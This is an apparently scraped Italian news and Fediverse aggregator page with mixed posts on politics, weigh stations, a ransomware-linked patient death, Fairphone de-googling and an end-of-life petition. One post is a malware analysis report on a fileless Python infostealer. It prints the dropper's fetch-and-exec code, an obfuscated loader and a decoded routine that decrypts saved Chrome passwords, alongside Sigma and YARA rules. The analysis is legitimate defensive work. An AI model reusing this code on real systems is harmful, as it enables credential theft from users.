Salta al contenuto principale




c'è un motivo se un questi anni tutte le armi più potenti nato sono state quelle usa e se si è cercato di de-potenziare l'europa con la scusa che tanto c'erano gli usa... trump si deve essere dimenticato tutto questo a cosa serviva (agli usa). l'italia avrebbe a esempio potuto avere l'atomica ma ha dovuto rinunciare a quella come alle armi atomiche o anche solo all'energia atomica applicata alle armi (ad esempio non portaerei atomiche) per accordi con gli usa... adesso vuole un'europa pesantemente armata? secondo me non dovremmo neppure farlo insistere tanto per ottenere quello che vuole.. che poi un'europa pesantemente armata andrà ancora a traino usa tutto questo è da solo sperare per trump...



Walter Verini: il caso Paragon è una ferita


@Giornalismo e disordine informativo
articolo21.org/2025/06/walter-…
Il governo continua a non essere trasparente sul caso Paragon, la vicenda dello spionaggio ai danni di attivisti e giornalisti, o cui telefoni sono stati infettati dal software militare Graphite dell’azienda israeliana Paragon Solutions, che in



Il fallimento della retorica (di G. Gambino)


@Politica interna, europea e internazionale
Nel teatro grande della politica internazionale, il Medio Oriente è il parco giochi preferito dei potenti del mondo (nel caso specifico tutti e tre uomini, tutti e tre anzianotti signori, tutti e tre smaniosi di mostrarsi il bullo più bullo del quartiere). Lo scenario ideale in cui da sempre si intrecciano



CitrixBleed 2.0 aggira l’autenticazione multi-fattore (MFA): Italia esposta


@Informatica (Italy e non Italy 😁)
CitrixBleed 2.0 è la nuova vulnerabilità nei prodotti Citrix NetScaler ADC e Gateway che, se sfruttata, consente agli aggressori di impersonare un utente legittimo e accedere ai servizi aziendali bypassando l’autenticazione multi-fattore (MFA). In Italia sono



Dio, secolarizzazione e Trump


@Giornalismo e disordine informativo
articolo21.org/2025/06/dio-sec…
Siamo davanti a una novità. Che il genere umano si sia sovente trovato davanti a strade diverse e che abbia valutato diverse ricette per fronteggiare i problemi del suo tempo è assodato: è sempre stato così. Ma oggi non si tratta di questo, per molti siamo usciti da una dialettica



È uscito il nuovo numero di The Post Internazionale. Da oggi potete acquistare la copia digitale


@Politica interna, europea e internazionale
È uscito il nuovo numero di The Post Internazionale. Il magazine, disponibile già da ora nella versione digitale sulla nostra App, e da domani, venerdì 27 giugno, in tutte le edicole, propone ogni due settimane inchieste e approfondimenti sugli affari e il



404 Media spoke to Dave McNamee, the original creator of the babyface Vance meme, about free speech, our rights, and how it feels to see the thing you created being blamed for someone's denial of entry to the U.S.

404 Media spoke to Dave McNamee, the original creator of the babyface Vance meme, about free speech, our rights, and how it feels to see the thing you created being blamed for someonex27;s denial of entry to the U.S.#vance #meme #Socialmedia #Immigration



It’s a legal requirement for data brokers to register in the state of California. ARC, the airlines-owned data broker that has been selling your flight information to the government for years, only just registered after being contacted by the office of Senator Ron Wyden.#News
#News


Field Guide to the North American Weigh Station


A lot of people complain that driving across the United States is boring. Having done the coast-to-coast trip seven times now, I can’t agree. Sure, the stretches through the Corn Belt get a little monotonous, but for someone like me who wants to know how everything works, even endless agriculture is fascinating; I love me some center-pivot irrigation.

One thing that has always attracted my attention while on these long road trips is the weigh stations that pop up along the way, particularly when you transition from one state to another. Maybe it’s just getting a chance to look at something other than wheat, but weigh stations are interesting in their own right because of everything that’s going on in these massive roadside plazas. Gone are the days of a simple pull-off with a mechanical scale that was closed far more often than it was open. Today’s weigh stations are critical infrastructure installations that are bristling with sensors to provide a multi-modal insight into the state of the trucks — and drivers — plying our increasingly crowded highways.

All About the Axles


Before diving into the nuts and bolts of weigh stations, it might be helpful to discuss the rationale behind infrastructure whose main function, at least to the casual observer, seems to be making the truck driver’s job even more challenging, not to mention less profitable. We’ve all probably sped by long lines of semi trucks queued up for the scales alongside a highway, pitying the poor drivers and wondering if the whole endeavor is worth the diesel being wasted.

The answer to that question boils down to one word: axles. In the United States, the maximum legal gross vehicle weight (GVW) for a fully loaded semi truck is typically 40 tons, although permits are issued for overweight vehicles. The typical “18-wheeler” will distribute that load over five axles, which means each axle transmits 16,000 pounds of force into the pavement, assuming an even distribution of weight across the length of the vehicle. Studies conducted in the early 1960s revealed that heavier trucks caused more damage to roadways than lighter passenger vehicles, and that the increase in damage is proportional to the fourth power of axle weight. So, keeping a close eye on truck weights is critical to protecting the highways.

Just how much damage trucks can cause to pavement is pretty alarming. Each axle of a truck creates a compression wave as it rolls along the pavement, as much as a few millimeters deep, depending on road construction and loads. The relentless cycle of compression and expansion results in pavement fatigue and cracks, which let water into the interior of the roadway. In cold weather, freeze-thaw cycles exert tremendous forces on the pavement that can tear it apart in short order. The greater the load on the truck, the more stress it puts on the roadway and the faster it wears out.

The other, perhaps more obvious reason to monitor axles passing over a highway is that they’re critical to truck safety. A truck’s axles have to support huge loads in a dynamic environment, and every component mounted to each axle, including springs, brakes, and wheels, is subject to huge forces that can lead to wear and catastrophic failure. Complete failure of an axle isn’t uncommon, and a driver can be completely unaware that a wheel has detached from a trailer and become an unguided missile bouncing down the highway. Regular inspections of the running gear on trucks and trailers are critical to avoiding these potentially catastrophic occurrences.

youtube.com/embed/veCl1BgoI74?…

Ways to Weigh


The first thing you’ll likely notice when driving past one of the approximately 700 official weigh stations lining the US Interstate highway system is how much space they take up. In contrast to the relatively modest weigh stations of the past, modern weigh stations take up a lot of real estate. Most weigh stations are optimized to get the greatest number of trucks processed as quickly as possible, which means constructing multiple lanes of approach to the scale house, along with lanes that can be used by exempt vehicles to bypass inspection, and turnout lanes and parking areas for closer inspection of select vehicles.

In addition to the physical footprint of the weigh station proper, supporting infrastructure can often be seen miles in advance. Fixed signs are usually the first indication that you’re getting near a weigh station, along with electronic signboards that can be changed remotely to indicate if the weigh station is open or closed. Signs give drivers time to figure out if they need to stop at the weigh station, and to begin the process of getting into the proper lane to negotiate the exit. Most weigh stations also have a net of sensors and cameras mounted to poles and overhead structures well before the weigh station exit. These are monitored by officers in the station to spot any trucks that are trying to avoid inspections.
Overhead view of a median weigh station on I-90 in Haugan, Montana. Traffic from both eastbound and westbound lanes uses left exits to access the scales in the center. There are ample turnouts for parking trucks that fail one test or another. Source: Google Maps.
Most weigh stations in the US are located off the right side of the highway, as left-hand exit ramps are generally more dangerous than right exits. Still, a single weigh station located in the median of the highway can serve traffic from both directions, so the extra risk of accidents from exiting the highway to the left is often outweighed by the savings of not having to build two separate facilities. Either way, the main feature of a weigh station is the scale house, a building with large windows that offer a commanding view of the entire plaza as well as an up-close look at the trucks passing over the scales embedded in the pavement directly adjacent to the structure.

Scales at a weigh station are generally of two types: static scales, and weigh-in-motion (WIM) systems. A static scale is a large platform, called a weighbridge, set into a pit in the inspection lane, with the surface flush with the roadway. The platform floats within the pit, supported by a set of cantilevers that transmit the force exerted by the truck to electronic load cells. The signal from the load cells is cleaned up by signal conditioners before going to analog-to-digital converters and being summed and dampened by a scale controller in the scale house.

The weighbridge on a static scale is usually long enough to accommodate an entire semi tractor and trailer, which accurately weighs the entire vehicle in one measurement. The disadvantage is that the entire truck has to come to a complete stop on the weighbridge to take a measurement. Add in the time it takes for the induced motion of the weighbridge to settle, along with the time needed for the driver to make a slow approach to the scale, and each measurement can add up to significant delays for truckers.
Weigh-in-motion sensor. WIM systems measure the force exerted by each axle and calculate a total gross vehicle weight (GVW) for the truck while it passes over the sensor. The spacing between axles is also measured to ensure compliance with state laws. Source: Central Carolina Scales, Inc.
To avoid these issues, weigh-in-motion systems are often used. WIM systems use much the same equipment as the weighbridge on a static scale, although they tend to use piezoelectric sensors rather than traditional strain-gauge load cells, and usually have a platform that’s only big enough to have one axle bear on it at a time. A truck using a WIM scale remains in motion while the force exerted by each axle is measured, allowing the controller to come up with a final GVW as well as weights for each axle. While some WIM systems can measure the weight of a vehicle at highway speed, most weigh stations require trucks to keep their speed pretty slow, under five miles per hour. This is obviously for everyone’s safety, and even though the somewhat stately procession of trucks through a WIM can still plug traffic up, keeping trucks from having to come to a complete stop and set their brakes greatly increases weigh station throughput.

Another advantage of WIM systems is that the spacing between axles can be measured. The speed of the truck through the scale can be measured, usually using a pair of inductive loops embedded in the roadway around the WIM sensors. Knowing the vehicle’s speed through the scale allows the scale controller to calculate the distance between axles. Some states strictly regulate the distance between a trailer’s kingpin, which is where it attaches to the tractor, and the trailer’s first axle. Trailers that are not in compliance can be flagged and directed to a parking area to await a service truck to come by to adjust the spacing of the trailer bogie.

Keep It Moving, Buddy

A PrePass transponder reader and antenna over Interstate 10 near Pearlington, Mississippi. Trucks can bypass a weigh station if their in-cab transponder identifies them as certified. Source: Tony Webster, CC BY-SA 2.0.
Despite the increased throughput of WIM scales, there are often too many trucks trying to use a weigh station at peak times. To reduce congestion further, some states participate in automatic bypass systems. These systems, generically known as PrePass for the specific brand with the greatest market penetration, use in-cab transponders that are interrogated by transmitters mounted over the roadway well in advance of the weigh station. The transponder code is sent to PrePass for authentication, and if the truck ID comes back to a company that has gone through the PrePass certification process, a signal is sent to the transponder telling the driver to bypass the weigh station. The transponder lights a green LED in this case, which stays lit for about 15 minutes, just in case the driver gets stopped by an overzealous trooper who mistakes the truck for a scofflaw.

PrePass transponders are just one aspect of an entire suite of automatic vehicle identification (AVI) systems used in the typical modern weigh station. Most weigh stations are positively bristling with cameras, some of which are dedicated to automatic license plate recognition. These are integrated into the scale controller system and serve to associate WIM data with a specific truck, so violations can be flagged. They also help with the enforcement of traffic laws, as well as locating human traffickers, an increasingly common problem. Weigh stations also often have laser scanners mounted on bridges over the approach lanes to detect unpermitted oversized loads. Image analysis systems are also used to verify the presence and proper operation of required equipment, such a mirrors, lights, and mudflaps. Some weigh stations also have systems that can interrogate the electronic logging device inside the cab to verify that the driver isn’t in violation of hours of service laws, which dictate how long a driver can be on the road before taking breaks.

Sensors Galore

IR cameras watch for heat issues on trucks at a Kentucky weigh station. Heat signatures can be used to detect bad tires, stuck brakes, exhaust problems, and even illicit cargo. Source: Trucking Life with Shawn
Another set of sensors often found in the outer reaches of the weigh station plaza is related to the mechanical status of the truck. Infrared cameras are often used to scan for excessive heat being emitted by an axle, often a sign of worn or damaged brakes. The status of a truck’s tires can also be monitored thanks to Tire Anomaly and Classification Systems (TACS), which use in-road sensors that can analyze the contact patch of each tire while the vehicle is in motion. TACS can detect flat tires, over- and under-inflated tires, tires that are completely missing from an axle, or even mismatched tires. Any of these anomalies can cause a tire to quickly wear out and potentially self-destruct at highway speeds, resulting in catastrophic damage to surrounding traffic.

Trucks with problems are diverted by overhead signboards and direction arrows to inspection lanes. There, trained truck inspectors will closely examine the flagged problem and verify the violation. If the problem is relatively minor, like a tire inflation problem, the driver might be able to fix the issue and get back on the road quickly. Trucks that can’t be made safe immediately might have to wait for mobile service units to come fix the problem, or possibly even be taken off the road completely. Only after the vehicle is rendered road-worthy again can you keep on trucking.

Featured image: “WeighStationSign” by [Wasted Time R]


hackaday.com/2025/06/26/field-…



È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista


Non è la prima volta che un attacco informatico si traduce in una perdita di vite umane.
Ne avevamo già parlato nell’articolo I decessi avvenuti per il ransomware. I casi noti, le tendenze e il punto sull’Italia, in cui analizzavamo il legame diretto tra incidenti cyber e morti documentate.

Purtroppo, questo fenomeno è sempre più frequente. Viviamo in un mondo interamente circondato da tecnologie digitali, e proprio per questo esposto al rischio di compromissione. Ma quando il bersaglio non è più un semplice dato, bensì un sistema critico come un pronto soccorso o un’infrastruttura sanitaria, le conseguenze non sono più virtuali: diventano tragicamente reali.

Secondo il National Health Service (NHS), l’anno scorso un attacco ransomware che ha interrotto gli esami del sangue in diversi ospedali di Londra ha contribuito alla morte di un paziente. L’attacco del gruppo di criminalità informatica Qilin contro il servizio di patologia Synnovis con sede a Londra, avvenuto lo scorso giugno, ha causato gravi interruzioni all’assistenza in numerosi ospedali del Servizio Sanitario Nazionale e presso fornitori di servizi sanitari di Londra.

A seguito dell’attacco, gli ospedali non sono stati in grado di eseguire gli esami del sangue alla normale velocità. Un portavoce del King’s College Hospital NHS Foundation Trust ha affermato che questo ritardo è stato tra “una serie di fattori contribuenti” che hanno portato alla morte di un paziente durante l’incidente, come riportato per primo dall’Health Service Journal.

“Purtroppo un paziente è morto improvvisamente durante l’attacco informatico. Come da prassi standard in questi casi, abbiamo effettuato un’analisi dettagliata delle sue cure”, ha dichiarato il portavoce. L’indagine sull’incidente relativo alla sicurezza del paziente ha individuato diversi fattori che hanno contribuito al decesso del paziente. Tra questi, la lunga attesa per l’esito di un esame del sangue a causa dell’attacco informatico che ha colpito i servizi di anatomia patologica in quel momento.

In una dichiarazione, il CEO di Synnovis, Mark Dollar, ha dichiarato: “Siamo profondamente addolorati nell’apprendere che l’attacco informatico criminale dell’anno scorso sia stato identificato come uno dei fattori che hanno contribuito alla morte di questo paziente. Siamo vicini alla famiglia coinvolta”.

Il mese scorso, Recorded Future News ha rivelato che due attacchi informatici che avrebbero interessato il Servizio Sanitario Nazionale (NHS) nel 2024 erano stati formalmente identificati come potenziali fattori di rischio per i pazienti. Si prevede che questi attacchi riguardino Synnovis e il Wirral University Teaching Hospital NHS Foundation Trust, causando ritardi nei trattamenti oncologici.

Si ritiene che i dati di oltre 900.000 individui siano stati compromessi dalle tattiche estorsive del gruppo ransomware, che prevedevano la pubblicazione dei risultati dei test che rivelavano i nomi dei pazienti con sintomi di infezioni sessualmente trasmissibili e cancro.

Un’analisi dei dati condotta dagli specialisti in violazioni dei dati CaseMatrix ha identificato nomi personali, date di nascita, numeri di telefono del Servizio Sanitario Nazionale e, in alcuni casi, dettagli di contatto personali, insieme ai moduli di patologia e istologia utilizzati per condividere i dati dei pazienti tra reparti medici e istituzioni. A un anno dalla violazione, i pazienti interessati non sono ancora stati informati su quali dati siano stati esposti nell’incidente.

L'articolo È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista proviene da il blog della sicurezza informatica.



Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi


TLP: AMBER
Analista: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Data ultima revisione: 2025-06-24

Questo report tecnico forense documenta l’analisi completa di un infostealer multi-stadio veicolato tramite un loader fileless in Python, identificato con la sigla “AP”. L’intera catena di infezione è eseguita in memoria e sfrutta servizi legittimi pubblici (Telegram, is.gd, paste.rs) per evitare la rilevazione e semplificare l’aggiornamento remoto del payload.

Il file iniziale, denominato Photos, contiene un dropper che esegue dinamicamente un secondo stadio offuscato, il quale a sua volta decodifica ed esegue in memoria un infostealer capace di esfiltrare informazioni sensibili da browser Chromium.

Catena di Infezione

Stadio 1 – Dropper Iniziale


Il file Photos contiene codice Base64 offuscato:

___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))

Decodifica del codice:

import requests, re
exec(
requests.get(
requests.head(
f'https://is.gd/{match.group(1)}', allow_redirects=True
).url
).text
)

if (
match := re.search(
r'

Funzionamento:

  • Recupera da un canale Telegram un codice og:description (es. fVmzS)
  • Usa is.gd per risolvere il link accorciato
  • Recupera un payload da paste.rs ed esegue dinamicamente


Stadio 2 – Loader Offuscato


Contenuto scaricato da paste.rs/fVmzS. Esegue la seguente catena:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$

Dopo b85 → zlib → marshal, è necessario un ulteriore passaggio:

decoded = bytearray([b ^ 0x04 for b in payload_bytes])

Il risultato è un bytecode deoffuscato eseguibile direttamente in memoria:

import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64

# Estrazione dati da Chromium (semplificato)

def get_chrome_data():
local_state_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Local State"
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = json.loads(f.read())
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)
[1] login_data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
shutil.copy2(login_data_path, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
login_url = row
[0] username = row
[1] password = win32crypt.CryptUnprotectData(row[2])[1].decode()
print(f"URL: {login_url}\nUsername: {username}\nPassword: {password}\n")
cursor.close()
conn.close()
os.remove("Loginvault.db")
get_chrome_data()

Stadio 3 – Infostealer


Il codice risultante:

  • Raccoglie credenziali, cookie, cronologia e carte da Chromium
  • Cattura fingerprinting del sistema
  • Comprimi dati in archivio .zip
  • Prepara e invia l’esfiltrazione verso un server remoto (C2)


Indicatori di Compromissione

Tecniche MITRE ATT&CK


  • T1059 – Command and Scripting Interpreter
  • T1027 – Obfuscated Files or Information
  • T1071.001 – Web Protocols
  • T1082 – System Information Discovery
  • T1567.002 – Exfiltration over Web Services
  • T1218.010 – Proxy Execution (custom variant)


Rilevazione

Sigma Rule


title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Rileva dropper Python fileless con payload remote

YARA Rule


rule Fileless_Telegram_Loader {
meta:
description = "Rileva loader fileless basato su Telegram + is.gd"
author = "Agostino Pellegrino (apinfosec.com)"
version = "1.1"
date = "2025-06-24"
strings:
$a = "exec(requests.get(" ascii
$b = "https://t.me/" ascii
$c = "https://is.gd/" ascii
$d = "og:description" ascii
condition:
all of them and filesize

Raccomandazioni


  • Isolare ambienti Python non gestiti
  • Bloccare traffico a t.me, is.gd, paste.rs ove non necessario
  • Attivare logging avanzato su processi RAM-residenti
  • Applicare detection YARA e Sigma in EDR/SIEM
  • Segnalare a CSIRT nazionale


Conclusioni


L’analisi tecnica condotta ha evidenziato l’elevato livello di sofisticazione dell’infostealer “AP”, capace di operare completamente in memoria, eludendo gran parte dei meccanismi di rilevamento tradizionali. La catena d’infezione multi-stadio utilizza un dropper fileless scritto in Python e sfrutta servizi pubblici legittimi — come Telegram, is.gd e paste.rs — per veicolare, aggiornare e rendere dinamico il payload finale.

Il secondo stadio, fortemente offuscato, culmina nell’esecuzione di un infostealer con capacità avanzate di esfiltrazione dati da browser Chromium-based, comprese credenziali salvate, cookie, cronologia e informazioni sensibili.

L’uso creativo e malevolo di meccanismi comuni (come i meta tag HTML, URL accorciati e servizi di messaggistica) rende questa minaccia particolarmente insidiosa, dimostrando una crescente tendenza all’abuso di infrastrutture legittime per finalità illecite.

Le tecniche MITRE ATT&CK individuate confermano il comportamento stealth e modulare del malware. L’adozione di meccanismi di rilevazione specifici, come regole Sigma e YARA personalizzate, è fondamentale per mitigare efficacemente questa minaccia. Inoltre, l’implementazione di policy restrittive e il monitoraggio continuo degli ambienti Python non gestiti rappresentano misure difensive prioritarie.

Questo caso studio rappresenta un chiaro esempio dell’evoluzione dei moderni infostealer verso architetture completamente fileless, con capacità di persistenza e aggiornamento che richiedono una risposta difensiva altrettanto dinamica e proattiva.

L'articolo Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi proviene da il blog della sicurezza informatica.



Curiosità sul Fairphone? Chiedete e vi sarà detto


Dal 2020 sono un utente #Fairphone, prima con il FP3+ e adesso con il FP5.

Sono un "Fairphone Angel" (è un nome che fa un po' ridere, lo so 😁 ) ovvero una di quelle persone che mettono la loro esperienza a disposizione di chi possiede un Fairphone o è interessato a saperne qualcosa di più (*). Maggiori informazioni le potete trovare qui.

Ho visto che nel Fediverso c'è un certo interesse su questi argomenti e così ho pensato di mettere un post "ad hoc" nel caso qualcuno volesse informazioni sul telefono.

Il sito ufficiale Fairphone è qui.

Bene, a voi la linea...

(*) Non abbiamo nessun rapporto organico con l'azienda né riceviamo compensi sotto nessuna forma, semplicemente crediamo in questo progetto, ci fa piacere contribuire in qualche modo e lo facciamo così.

in reply to Max su Poliverso 🇪🇺🇮🇹

Io chiedo una cosa che potrebbe riguardare molti utenti Android.

S'è capito se la app di sistema è solo l'androidSystemWebview? Dico perché c'è anche googlePlayServices, che pesa più di un giga, e che se disattivata non fa più funzionare le app Messaggi, Contatti e quindi Chiamate. (Poi, abbiamo consigli per sostituire queste ultime? Sembra mossa azzardata per quanto sono basilari, ma fa brutto vedersi anche queste targate google.)

in reply to Low res Loud audio

@Loud audio

Sono domande un po' troppo tecniche per me, se le fai nel forum Fairphone magari trovi qualcuno che può rispondere.

Posso però dirti che sul mio telefono ci sono entrambe e che non possono essere disinstallate, la prima è di 80 MB circa e la seconda di più di un GB.

Comunque il Fairphone oltre a essere venduto con Android è venduto anche con /e/OS che a quanto ne so è un Android "de-googlizzato".

in reply to Max su Poliverso 🇪🇺🇮🇹

Quale forum dici?
Io presi un FP4 prima che fosse disponibile l'opzione /e/ per cui riformulo meglio la delusione accennata in
snowfan.masto.host/@siro/11474…
e riassumibile come: potevano anche dire che con un FP non degooglizzi un bel niente.

Il fatto è che, disattivate le principali app di Google come Chrome, gMail, Maps, Meet, Foto (ancora un'altra decente per gestire le immagini non ce l'ho), Drive ecc..., rimangono le una o due propriamente "di sistema" trattate sopra, e le altre >>

in reply to Low res Loud audio

->
basilari come Contatti, Messaggi e Chiamate. Il che fa orrore ma ok poiché almeno queste ultime si capisce a cosa servono.
Solo che, come si vede nello screenshot, ce ne sono poi (forse i tutti gli Android degli ultimi 5 anni) tante altre ancora, "minori" che non saprei da dove partire per togliere.

Ammetto anche che, fino a due anni fa, ero rimasto a un telefono più semplice e dove, essendoci meno app, era più facile sostituirle o toglierle godendosi un minimo il detox.

@max

Questa voce è stata modificata (2 mesi fa)
in reply to Low res Loud audio

@Loud audio

Scusa il ritardo ma in questi giorni sono stato un po' a spasso.

Dunque... per come la conosco io la Fairphone ha come mission quella di rendere disponibile un telefono rispettoso dell'ambiente e dei diritti umani. Non mi pare ci sia un focus altrettanto accentuato sulla privacy e credo sia il motivo per cui non abbiano spinto troppo sulla de-googlizzazione del loro telefono oltre il dare la possibilità di comprare il telefono con /e/ preinstallato.

Sulle tante app che chissà cosa fanno e perché non posso disinstallarle non so cosa dire, non so neanche quanta libertà abbia chi usa Android di ritagliarsi un sistema dove tutto sia customizzabile.

Mi pare che qualcosa si possa rimuovere tramite adb, l'avevo usato per qualche minuto tanto per vedere cosa fosse.

Credo che non insistere troppo sulla de-googlizzazione serva anche a dare un telefono più "user friendly". Già chi si prende un Fairphone si prende un telefono non facile, come scrivevo, se poi gli togli anche tutti i punti di riferimento tipo Gmail, ecc. alla fine ti ritrovi con un prodotto da nerds che comprerebbero in tre e così addio...

in reply to Max su Poliverso 🇪🇺🇮🇹

Capisco sul FP, forse avevo intravisto chissà che io, grazie.

Però in generale noi fediAndroidi, il togliere quei punti di riferimento, dovremmo considerarlo pratica condivisa, bastando testardaggine senza essere dei nerd (parola sfuggita di mano). Altrimenti quando mai avremo una fetta di popolazione convinta che c'è da diffidare dei servizi preinstallati nel cellulare comprato?

Propongo di esser coesi almeno sulle tante app google secondarie che deve portare mala sorte aggiornarle.

in reply to Low res Loud audio

@Loud audio

Io credo che bisogna valutare quali lotte fare perché farle tutte è impossibile.

Io per esempio negli ultimi sei mesi ho lasciato Facebook e mi sono fatto un file repository sul mio spazio web (con NextCloud) per sostituire Google Drive.

Per tante cose purtroppo resterò legato alle Big Tech, staccarsi del tutto per me è impossibile per vari motivi, i principali sono che non ho il tempo materiale per ricostruirmi e gestirmi in privato tutti i servizi che sto usando e che vivo in un ecosistema informatico in cui quei sistemi sono diffusissimi e usati da tutte le persone che conosco. Staccarmi da tutto (penso a WhatsApp ad esempio) vorrebbe dire per me diventare un eremita digitale.

Un telefonino completamente de-googlizzato al momento non posso permettermelo però è una delle cose che mi interesserebbe di più, è nella lista delle cose da fare 😁

in reply to Max su Poliverso 🇪🇺🇮🇹

Ma sì che siamo concordi: a meno che non sia l'unica, per portare a casa la pagnotta o per non perdere i propri cari, evitare Gafam e comportamenti simili. Ciao


Riad tra Usa e Cina, la doppia via della difesa aerea. Scrive Mayer

@Notizie dall'Italia e dal mondo

La capacità dimostrata dall’Iran di “bucare” lo spazio aereo di Israele con nuovi missili balistici a medio e lungo raggio ha messo in allarme tutti gli Stati della regione, con l’eccezione della Turchia, che può contare sull’articolo 5 della Nato, peraltro solennemente riaffermato nella dichiarazione finale del



Spagna e Nato, isolazionismo o posizionamento strategico? L’analisi di Caffio

@Notizie dall'Italia e dal mondo

Con una nuova mossa “pacifista”, dopo aver preso le distanze dall’operazione Ue nel mar Rosso contro gli Houthi, Madrid di dissocia ora dalle decisioni Nato sull’incremento delle spese difesa. Anche se motivata da ragioni sociali, la scelta del governo Sanchez appare



An Ohio man is accused of making violent, graphic deepfakes of women with their fathers, and of their children. Device searches revealed he searched for "undress" apps and "ai porn."#Deepfakes #AI #AIPorn


Al via la raccolta firme della proposta di iniziativa popolare per legalizzare tutte le scelte di Fine vita


QUI per firmare la proposta di legge online


Si è tenuta oggi, giovedì 26 giugno, in Piazza XXV Aprile a Milano, la conferenza stampa di lancio della raccolta firme per una proposta di legge di iniziativa popolare finalizzata a legalizzare tutte le scelte di fine vita, inclusa l’eutanasia, promossa dall’Associazione Luca Coscioni.

Nel corso dell’iniziativa – alla quale hanno preso parte Marco Cappato, tesoriere dell’Associazione Luca Coscioni e Matteo Mainardi, coordinatore delle campagne sul fine vita – insieme alla consigliera regionale della Lombardia (in quota Partito Democratico) Carmela Rozza, l’esponente del gruppo consiliare di Alleanza Verdi e Sinistra a Sesto San Giovanni Michele Foggetta, il consigliere comunale ed esponenti dei Sentinelli Milano, Alessandro Giungi – è stato attivato il primo tavolo di raccolta firme. Nei prossimi giorni, l’attività proseguirà in centinaia di piazze italiane.

L’obiettivo è di raccogliere le firme di almeno 50.000 persone in due settimane necessarie per poter depositare la proposta in Parlamento prima della ripresa della discussione sul fine vita prevista in Senato il 17 luglio.


La proposta di legge, depositata in Corte di Cassazione, su cui inizia la raccolta firme, prevede la possibilità per ogni persona maggiorenne, pienamente capace di prendere decisioni libere e consapevoli, affetta da una condizione o patologia irreversibile o da una patologia con una prognosi infausta a breve termine, fonte di sofferenze fisiche o psicologiche ritenute intollerabili, di richiedere, previa verifica delle condizioni, assistenza per porre fine volontariamente alla propria vita mediante autosomministrazione o somministrazione dei farmaci per il fine vita.

La legge prevede:

  • la libertà di scelta tra autosomministrazione o somministrazione da parte di un medico;
  • la presa in carico da parte del Servizio sanitario nazionale, con conclusione delle verifiche entro 30 giorni dalla richiesta;
  • la possibilità per i medici di partecipare su base volontaria.

Il testo mira a superare le disuguaglianze territoriali e a garantire un diritto esigibile in tutto il Paese, nel rispetto dei principi costituzionali di autodeterminazione, dignità e umanità.

“Le persone con patologie irreversibili e sofferenze insopportabili hanno già diritto da sette anni a essere aiutate a morire senza soffrire in Italia grazie alla sentenza della Corte Costituzionale – dichiara Marco Cappato, Tesoriere Associazione Luca Coscioni -. Ora il Governo vuole restringere e cancellare questo diritto eliminando il ruolo del Servizio Sanitario Nazionale. Come Associazione Luca Coscioni invece proponiamo attraverso la legge di Iniziativa Popolare Eutanasia Legale di estendere il diritto ad essere aiutati anche da parte di un medico e anche per le persone che non siano dipendenti da trattamenti sanitari come i malattie terminali di cancro. Dopo aver raccolto 50.000 firme, a nome delle persone che avranno aderito presenteremo questa proposta entro metà luglio e il Parlamento dovrà discuterne quando avvierà il dibattito sul tema, dal 17 luglio in poi”.

Il testo integrale della proposta di legge, il materiale informativo e la mappa aggiornata dei tavoli per la raccolta firme sono disponibili QUI


L'articolo Al via la raccolta firme della proposta di iniziativa popolare per legalizzare tutte le scelte di Fine vita proviene da Associazione Luca Coscioni.




Andrea Van Cleef – Greetings from Slaughter Creek
freezonemagazine.com/articoli/…
Passo dopo passo, Andrea Van Cleef, sta conquistando un posto sempre più rilevante nel cuore degli appassionati. E questo grazie ad alcuni dati oggettivi che è facile rilevare. Vogliamo partire dalla voce? Quanti possono vantare un timbro vocale tanto profondo e toccante senza bisogno di sbraitare inutilmente? In Italia direi pochi, forse nessuno, almeno, a


E’ stato presentato il XVI Libro Bianco sulle Droghe di cui l’Associazione Luca Coscioni è co-sponsor


In occasione della Giornata mondiale sulle Droghe (26 giugno) e nell’ambito della campagna internazionale di mobilitazione Support! Don’t Punish è stato presentato alla Sala Stampa della Camera dei Deputati Il XVI Libro Bianco sulle droghe, quest’anno intitolato “NON MOLLARE”. Il Libro Bianco è un rapporto indipendente sugli effetti del Testo Unico sugli stupefacenti (DPR 309/90) sul sistema penale, sui servizi, sulla salute delle persone che usano sostanze e sulla società. È promosso da La Società della Ragione, Forum Droghe, Antigone, CGIL, CNCA, Associazione Luca Coscioni, ARCI, LILA con l’adesione di A Buon Diritto, Comunità di San Benedetto al Porto, Funzione Pubblica CGIL, Gruppo Abele, ITARDD, ITANPUD, Meglio Legale e EUMANS.

L’edizione del 2025 è dedicata a Grazia Zuffa, già docente, parlamentare e membra del Comitato nazionale di bioetica e fondatrice di Forum Droghe e la Società della Ragione morta improvvisamente questa primavera.

Il contributo dell’Associazione Luca Coscioni, di Marco Perduca e Peppe Brescia, riguarda le attività in corso affinché l’Italia apra alle terapie psichedeliche, un appello sottoscritto da oltre 15.000 persone che chiede al Governo di includere strutturalmente le molecole psichedeliche tra le cure palliative, sostenere l’accesso a terapie compassionevoli innovative, sempre con psichedelici, e suggerisce al Ministero della Difesa di prevedere progetti pilota di psicoterapie assistite da MDMA per lo stress post-traumatico sviluppato dal personale impiegato in zone di conflitto. L’Associazione è anche una delle organizzazioni che hanno lanciato l’iniziativa civica europea Psychedelicare.eu e produce il podcast Illuminismo Psichedelico curato da Federico Di Vita.

Dati e documenti sono sul sito dell’Associazione Luca Coscioni.


— Le droghe e la repressione: dati in pillole —


predisposti dal comitato di redazione diretto da Franco Corleone e coordinato da Leonardo Fiorentini

